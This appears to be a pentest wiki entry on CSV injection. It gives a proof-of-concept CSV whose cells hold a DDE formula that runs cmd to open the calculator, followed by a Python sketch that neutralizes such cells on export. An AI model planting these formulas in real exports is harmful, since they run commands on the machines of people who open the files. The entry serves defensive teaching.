Cobalt Crowdsourced Application Pentest

Cobalt Vulnerability Wiki


V5 - Validation/Sanitization

CSV Injection

POC

Import a CSV with the following contents:

    Customer,Another
    =2+5+cmd|' /C calc'!A0,=2+5+cmd|' /C calc'!A0

Download the file to pop up the calculator on Windows.

Impact

Low

Likelihood

Low
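
Added example (not part of the Cobalt wiki entry): one way to neutralize cells like those in the POC when an application exports user-supplied data to CSV, using the widely recommended approach of prefixing formula-leading cells with a single quote and quoting every field. The names neutralize_cell, export_rows and SAMPLE_ROWS are hypothetical, and letting plain numbers such as -5 through unchanged is an assumption of this sketch.

```python
import csv
import io
import re

# Characters that make a spreadsheet application treat a cell as a formula.
FORMULA_CHARS = {"=", "+", "-", "@"}
# Tab and carriage return are included because they can precede a formula.
TRIGGERS = FORMULA_CHARS | {"\t", "\r"}
# Assumption of this sketch: plain signed numbers are legitimate data.
NUMERIC = re.compile(r"[+-]?\d+(\.\d+)?")


def neutralize_cell(value):
    """Return the cell as text, prefixed with ' if it could run as a formula."""
    text = "" if value is None else str(value)
    if NUMERIC.fullmatch(text):
        return text
    # Check the raw first character, and also the first character after
    # leading whitespace, so padded payloads are caught as well.
    if text[:1] in TRIGGERS or text.lstrip()[:1] in FORMULA_CHARS:
        return "'" + text
    return text


def export_rows(rows):
    """Serialize rows to CSV with every field neutralized and quoted."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for row in rows:
        writer.writerow([neutralize_cell(cell) for cell in row])
    return buf.getvalue()


# Constructed sample input: the header and payload from the POC above,
# plus a legitimate negative number to show it is left alone.
SAMPLE_ROWS = [
    ["Customer", "Another"],
    ["=2+5+cmd|' /C calc'!A0", "-5"],
]

if __name__ == "__main__":
    print(export_rows(SAMPLE_ROWS), end="")
```

The same neutralization belongs on the export path, since the formula runs on the machine of whoever downloads and opens the file.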